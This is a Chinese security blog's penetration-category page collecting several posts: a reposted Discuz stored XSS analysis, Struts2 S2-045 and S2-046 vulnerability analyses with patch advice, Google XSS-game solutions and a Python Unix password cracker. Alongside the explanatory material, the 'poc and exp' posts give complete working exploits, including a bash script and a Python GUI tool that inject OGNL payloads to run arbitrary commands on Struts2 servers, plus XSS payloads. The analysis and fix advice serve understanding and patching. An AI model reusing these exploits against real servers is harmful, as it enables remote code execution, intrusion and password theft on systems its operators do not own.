Classification:Penetration

Classification (Penetration)'s result:

(转)Discuz 全版本存储 XSS 分析

本文转载自:http://rickgray.me/2015/07/31/discuz-all-version-stored-xss-analysis.html?utm_source=tuicool&utm_medium=referral 乌云上有人发了《Discuz全版本存储型DOM XSS(可打管理员)附Discuz官方开发4大坑&验证脚本》,借此文顺带练习了一下 JS 调试,下面是整个漏洞的分析。 Discuz在用户评论处设置了帖子管理员编辑评论的功能,由于前端JS代码处理不当导致了经过恶意构造的评论内容在经过交互后形成XSS。下面通过payload的调试过程来解释该漏洞的形成过程。 首先,在评论处提交评论内容:[email=2″onmouseover=”alert(2)]2[/email] 由于服务器对引号等有过滤,所以提交后,查看源码会发现引号已经被实体编码了。 对于普通用户提交的评论,管理员或者版主都有权利对其发表的评论进行管理。 当管理或版主对用户的评论点击管理时,前端JS代码就开始处理,弹出一个编辑框供管理或版主操作。在JS代码处理的过程中,首先获取用户评论的内容,代码位于当前页面中: 而 $() 函数原型位于 /static/js/common.js 中: 使用了原生的 document.getElementById() 函数来获取页面中的对应对象,此处获取的是标有id=”e_textarea”的对象,其对应的值为用户评论的内容。 而由于JS原生函数的原因,被服务器后端转义的引号会被重新是渲染回引号: 获取到id=”e_textarea”对象后,代码对浏览器进行了判断,并将结果赋值给变量 var wysiwyg。 在页面上另一处JS代码判断了变量wysiwyg的值,然后开始渲染编辑框: 这里使用了Firfox浏览器进行测试,在前面wysiwyg变量的值为1,所以会执行如下代码 newEditor(1, bbcode2html(textobj.value)) 其中textobj.value的值为:[email=2″onmouseover=”alert(2)]2[/email](经过document.getElementById()获取的对象解析了实体编码) 在进行newEditor()时,会对传入的内容使用函数bbcode2html()进行编码过滤,其函数原型位于/static/js/bbcode.js,下面是Discuz对程序所支持的shortcode进行处理的部分代码。 程序匹配其支持的shortcode然后正则替换为相应的前端格式代码,因此次测试的payload为[email=2”onmouseover=”alert(2)]2[/email],因此图中红色标注的代码会得到执行。 str = str.replace(/\[email=(.[^\[]*)\](.*?)\[\/email\]/ig, ‘<a href=”mailto:$1″ target=”_blank”>$2</a>’); 经过正则匹配替换后,str的值会变为:<a href=”mailto:2″onmouseover=”alert(2)” target=”_blank”>2</a> 最终bbcode2html()函数会返回经过转换后的textobj.value,值为:<a href=”mailto:2″onmouseover=”alert(2)” target=”_blank”>2</a> 然后调用newEditor()函数进编辑框的渲染,其函数原型位于/static/js/editor.js 从函数原型可以看到,代码再次判断浏览器类型然后开始渲染,由于wysiwyq变量的值为1,最终会执行 writeEditorContents(isUndefined(initialtext) ? textobj.value: initialtext); 而调用newEditor()函数时,传递了initialtext参数,其值就为经过bbcode2html()函数处理后的textobj.value的值。 前端JS最终使用writeEditorContents()函数对页面进行渲染,其过程中会将initialtext变量的值直接写入到页面中,最终形成XSS。 渲染成功后,查看页面源代码: 当管理员或者版主对其进行交互时就会触发alert(2)。 即使后段服务器对输入内容进行了过滤和转义,但是在前段渲染的时候依然有可能形成 XSS。 ========================================================================= LSA刚接触js调试,按上面的步骤用discuz x3.2重现了一下bug,网上说有两个payload可以用([eemail=2″ onmouseover=”alert(2)]2[/eemail]或[align=” onmouseover=”alert(1)])LSA用第一个进行测试,的确可行,附上效果图(第一个payload被直接解析了所以打多个e避免被解析) 没按编辑之前:(引号经过了实体编码) 按了编辑之后:(引号经过js原生函数getElementByid()的调用又渲染为引号,引发xss) bug重现: discuz和struts2都可以说是漏洞王了,人怕出名猪怕壮,有名自然多人搞,不过正因为如此,产品才能不断完善。 (这漏洞两年前的了,看到ichunqiu上有就测试下,本人对于js调试还是懵逼状态……)

(转)【漏洞分析】Strust2 S2-046 远程代码执行漏洞两个触发点分析

本文转载自 安全客 ,原文地址:http://bobao.360.cn/learning/detail/3639.html   传送门 【重大漏洞预警】Struts 2 远程代码执行漏洞(s2-045\s2-046) (含PoC) 0x00 漏洞介绍 S2-046漏洞和S2-045漏洞非常相似,都是由报错信息带入了buildErrorMessage这个方法造成的。 但是这次存在两个触发点。 Content-Length 的长度值超长 Content-Disposition的filename存在空字节 0x01 漏洞分析 Content-Length 的长度值超长 这个漏洞需要在strust.xml中加入 <constant name=”struts.multipart.parser” value=”jakarta-stream” />才能触发。 触发漏洞的代码在 JakartaStreamMultiPartRequest类中,processUpload函数处理了content-length长度超长的异常,导致问题触发。 private void processUpload(HttpServletRequest request, String saveDir) throws Exception { // Sanity check that the request is a multi-part/form-data request. if (ServletFileUpload.isMultipartContent(request)) { // Sanity check on request size. boolean requestSizePermitted = isRequestSizePermitted(request); // Interface with Commons FileUpload API // Using the Streaming API ServletFileUpload servletFileUpload = new ServletFileUpload(); FileItemIterator i = servletFileUpload.getItemIterator(request); // Iterate the file items while (i.hasNext()) { try { FileItemStream itemStream = i.next(); // If the file item stream is a form field, delegate to the // field item stream handler if (itemStream.isFormField()) { processFileItemStreamAsFormField(itemStream); } // Delegate the file item stream for a file field to the // file item stream handler, but delegation is skipped // if the requestSizePermitted check failed based on the // complete content-size of the request. else { // prevent processing file field item if request size not allowed. // also warn user in……

struts2-046 poc and exp

据说045补了之后046就没用了,感觉影响没045这么犀利了…… POC:(来源于:https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723# ) POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ——WebKitFormBoundaryAnmUgTEhFhOZpr9z Content-Disposition: form-data; name=”upload”; filename=”%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Test’,’Kaboom’)}” Content-Type: text/plain Kaboom ——WebKitFormBoundaryAnmUgTEhFhOZpr9z– EXP: exploit-db.sh:(来源于:https://github.com/jas502n/st2-046-poc) #!/bin/bash url=$1 cmd=$2 shift shift boundary=”—————————735323031399963166993862150″ content_type=”multipart/form-data; boundary=$boundary” payload=$(echo “%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='”$cmd”‘).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}”) printf — “–$boundary\r\nContent-Disposition: form-data; name=\”foo\”; filename=\”%s\0b\”\r\nContent-Type: text/plain\r\n\r\nx\r\n–$boundary–\r\n\r\n” “$payload” | curl “$url” -H “Content-Type: $content_type” -H “Expect: ” -H “Connection: close” –data-binary @- $@ 3.友情检测: 此exp可以利用。 希望广大站长及时修补漏洞,避免不必要的损失。  

Apache Struts2再曝RCE漏洞(s2-046 CVE-2017-5638)

1.概述: 这次的s2-046和之前的s2-045相似,也是RCE漏洞,也是BuildErrorMessage,也是执行ognl……,但是攻击向量不同,这次漏洞编号都没变。 2.什么是apache、struts? Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。众所周知的SSH框架就是用了struts2。 3.漏洞原因: 使用恶意的Content-Disposition值或者使用不合适的Content-Length头就可能导致RCE。 所以此洞的触发如下: (1)JakartaStreamMultipartRequest已开启。也就是说,Struts2需要通过Jakarta stream parser配置(非默认)。在Struts2配置文件中检查<constant name=”struts.multipart.parser” value=”jakarta-stream” /> (2)上传文件的大小(由Content-Length头指定)大于Struts2允许的最大大小(2GB)。 (3)header中的Content-Disposition中包含空字节。 (4)文件名内容构造恶意的OGNL内容。 官方链接:http://struts.apache.org/docs/s2-046.html 4.修复方案: 4.1.如果你正在使用基于Jakarta的文件上传Multipart解析器,请将Apache Struts升级到2.3.32或2.5.10.1。 4.2.采用其他Mutipart解析器实施方案。Apache提供2个插件作为解决方案(点击这里)——如果使用的是Apache Struts 2.3.8 – 2.5.5或者2.3.20 – 2.5.5版本,即可采用该解决方案。 4.3.从堆中移除File Upload Interceptor,定义自有堆并设为默认(具体怎么做可以点击这里),该解决方案针对Struts 2.5.8 – 2.5.10有效 4.4. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。   5.参考链接: http://www.freebuf.com/vuls/129871.html http://bobao.360.cn/learning/detail/3571.html        

struts2 045 poc and exp

POC: 网上看的一个poc: import requests import sys def poc(url): payload = “%{(#test=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}” headers = {} headers[“Content-Type”] = payload r = requests.get(url, headers=headers) if “105059592” in r.content: return True return False if __name__ == ‘__main__’: if len(sys.argv) == 1: print “python s2-045.py target” sys.exit() if poc(sys.argv[1]): print “vulnerable” else: print “not vulnerable” 102*102*102*99=105059592,看了一下这个poc,好像又明白了异常怎么抛出的了,因为poc里不是一开头就是Multipart,而是注入ognl语言。Payload里打印102*102*102*99的值,如果返回的页面有105059592则表明存在st2-045远程命令执行漏洞。 EXP: 网上流传的一个exp: #coding:utf-8 import urllib2 from Tkinter import * import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers class START(): def __init__(self,root): self.root=root self.show_W_Text = Text() self.show_url_ed = Label(root, text=”str2″) self.edit_url = Entry(root, text=”输入地址”) self.edit_cmd = Entry(root, text=”输入cmd”) self.butt_whois = Button(root, text=”检测”,command=self.poc) self.show_url_ed.pack() self.edit_url.pack() self.edit_cmd.pack() self.butt_whois.pack() self.show_W_Text.pack() def poc(self): w_url = self.edit_url.get() w_cmd = self.edit_cmd.get() text = self.show_W_Text register_openers() datagen, header = multipart_encode({“image1”: open(“tmp.txt”, “rb”)}) header[ “User-Agent”] = “Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36” header[ “Content-Type”] = “%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='” + w_cmd + “‘).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}” request = urllib2.Request(w_url, datagen, headers=header) response = urllib2.urlopen(request).read() text.insert(1.0, response) if __name__ == ‘__main__’: root=Tk() root.title(“str2 045”) motion=START(root) mainloop() exp大概和poc一样。 友情检测: 希望各网站管理员及时修复,避免不必要的损失。

对struts2 045漏洞的分析

struts2 045曝出已经近6天了,网上的站也修复得差不多了,针对此漏洞,LSA参考了网上相关文章,加上LSA的一些浅陋的分析,总结整理得出此文。 1.漏洞原因: 1.1:由于Strus2对错误消息处理时,出现了纰漏。 1.2:通过content-type这个header头,注入OGNL语言,进而执行命令。 1.3:   基于Jakarta Multipart parser的文件上传模块在处理文件上传(multipart)的请求时候对异常信息做了捕获,并对异常信息做了OGNL表达式处理。但在在判断content-type不正确的时候会抛出异常并且带上Content-Type属性值,可通过精心构造附带OGNL表达式的URL导致远程代码执行。 1.4:官方公告 https://cwiki.apache.org/confluence/display/WW/S2-045 2.影响版本: Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 基本通杀! 3.漏洞分析(基于2.3.20): 3.1:jakarta 首先,通过官方说明可知漏洞发生在文件上传过程中。上传下载是一个常用功能,而Struts2本身并不提供上传解析器的,在org.apache.struts2包中,struts2向我们提供了以下三种方式支持文件上传。 default.properties: ### Parser to handle HTTP POST requests, encoded using the MIME-type multipart/form-data # struts.multipart.parser=cos # struts.multipart.parser=pell # struts.multipart.parser=jakarta-stream struts.multipart.parser=jakarta # uses javax.servlet.context.tempdir by default struts.multipart.saveDir= struts.multipart.maxSize=2097152 本次漏洞之所以影响广泛,重要原因之一是因为本次出问题的模块是系统的默认提供的模块—Jakarta。Jakarta依赖于commons-fileupload和commons-io两个包,所以只要存在这两个包,就可以模拟文件上传。而在struts2提供的基本示例struts2_blank中,这两个包也是存在的。 Struts2上传默认使用的是org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest类,对上传数据进行解析。不存在插件这个说法,只不过它最终调用了第三方组件common upload完成上传操作。 struts.multipart.parser:该属性指定处理multipart/form-data的MIME类型(文件上传)请求的框架,该属性支持cos、pell和jakarta等属性值,即分别对应使用cos的文件上传框架、pell上传及common-fileupload文件上传框架。该属性的默认值为jakarta。 3.2: request封装 为了能被action访问到上传的文件,通常会重新封装request,首先进入StrutsPrepareAndExecuteFilter类,这是Struts2默认配置的入口过滤器。在里面可以看到,Struts2首先对输入请求对象request的进行封装: request = prepare.wrapRequest(request); 跟进这条语句,可以看到封装为StrutsRequestWrapper的过程: Dispatcher.java: public HttpServletRequest wrapRequest(HttpServletRequest request) throws IOException { // don’t wrap more than once if (request instanceof StrutsRequestWrapper) { return request; } String content_type = request.getContentType(); if (content_type != null && content_type.contains(“multipart/form-data”)) { MultiPartRequest mpr = getMultiPartRequest(); LocaleProvider provider = getContainer().getInstance(LocaleProvider.class); request = new MultiPartRequestWrapper(mpr, request, getSaveDir(), provider); } else { request = new StrutsRequestWrapper(request, disableRequestAttributeValueStackLookup); } return request; } 关键点1:content_type.contains(“multipart/form-data”),poc会利用到。 关键点2:getMultiPartRequest(),默认返回JakartaMultiPartRequest类,就是默认开启的jakarta上传机制,所以此洞危害巨大。 3.3:异常信息: 既然在Struts里是可以直接执行异常里的错误信息,那么在common upload file 组件的异常里我们看看哪些是会把客户端传递的值作为错误信息返回。 很幸运,我们在FileUploadBase.java中,发现了一个方法(这个FileUploadBase.java文件LSA在2.3.20和2.3.31版本找了很久也没找到,只找到FileUploadBase.class,反编译不完全,不知道网上的高手们在哪里挖出这个文件的) 1.teratorImpl(RequestContext ctx) 2. throws FileUploadException, IOException { 3. if (ctx == null) { 4. throw new NullPointerException(“ctx parameter”); 5. } 6. 7. String contentType = ctx.getContentType(); 8. if ((null == contentType) 9. || (!contentType.toLowerCase(Locale.ENGLISH).startsWith(MULTIPART))) { 10. throw new……

Apache Struts2 RCE bug (S2-045,CVE-2017-5638)

1.概述: 2017.03.07,网上曝出了apache struts2的RCE漏洞,编号CVE-2017-5638。 安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架——Struts2存在远程代码执行的严重漏洞。 2.什么是apache、struts? Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。众所周知的SSH框架就是用了struts2。 3.漏洞原因: Struts使用的Jakarta解析文件上传请求出现异常时,对异常的处理不当,当远程攻击者构造恶意的Content-Type(注入ognl语言),可能导致RCE。 官方链接:https://cwiki.apache.org/confluence/display/WW/S2-045 4.影响版本: Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.10 基本通杀了! 5.修复方案: 5.1:升级到Apache Struts 2.3.32或2.5.10.1版。 5.2:切换到不同的实现文件上传Multipart解析器(有3种可以选择,默认开启jakarta,此漏洞危害甚广!) 5.3:临时解决方案:删除commons-fileupload-x.x.x.jar文件(会造成上传功能不可用)。  

Google xss-game solution(level 1-6)

[1/6]  Level 1: Hello, world of XSS bug: message = “Sorry, no results were found for <b>” + query + “</b>.” message += ” <a href=’?’>Try again</a>.” # Display the results page self.render_string(page_header + message + page_footer) exp: <script>alert(/xss/)</script> [2/6]  Level 2: Persistence is key bug: html += “<blockquote>” + posts[i].message + “</blockquote”; …… var message = document.getElementById(‘post-content’).value; exp:<img src=1 onerror=”alert(/xss/)”> [3/6]  Level 3: That sinking feeling… bug: html += “<img src=’/static/level3/cloud” + num + “.jpg’ />”; exp:https://xss-game.appspot.com/level3/frame#2xss’ onerror=”alert(/xss/)” [4/6]  Level 4: Context matters bug: <img src=”/static/loading.gif” onload=”startTimer(‘{{ timer }}’);” /> exp:3′);alert(‘xss [5/6]  Level 5: Breaking protocol bug: https://xss-game.appspot.com/level5/frame/signup?next=confirm <a href=”{{ next }}”>Next >></a> we can change the ‘next’ parameter. exp:https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert(/xss/) then click go,and input email or everything [6/6]  Level 6: Follow the 🐇 bug: if (url.match(/^https?:\/\//)) {—————–bypass:t-T scriptEl.src = url; // Show log messages scriptEl.onload = function() { setInnerText(document.getElementById(“log”), “Loaded gadget from ” + url); …… // Take the value after # and use it as the gadget filename. function getGadgetName() { return window.location.hash.substr(1) || “/static/gadget.js”; } includeGadget(getGadgetName()); we……

Use python to crack Unix password

Environment:Ubuntu+python2.7 As we know,Unix use crypt() to encrypt password,so we can use crypt() to crack it. #!/usr/bin/python #coding:utf-8 #Author:LSA #Description:Use crypt() to crack Unix password #Date:20170219 import crypt def crackUnixPass(cryptPassword): salt = cryptPassword[0:2] dFile = open(‘dictionary.txt’,’r’) for word in dFile: word = word.strip(‘\r\n’) cryptWord = crypt.crypt(word, salt) if cryptWord == cryptPassword: print ‘Found password: ‘+word+’\n’ return print ‘Password not found.’ return def main(): pFile = open(‘passwords.txt’) for line in pFile: if ‘:’ in line: user = line.split(‘:’)[0] cryptPassword = line.split(‘:’)[1].strip(‘ ‘) print ‘Cracking password for: ‘+user crackUnixPass(cryptPassword) if __name__==’__main__’: main()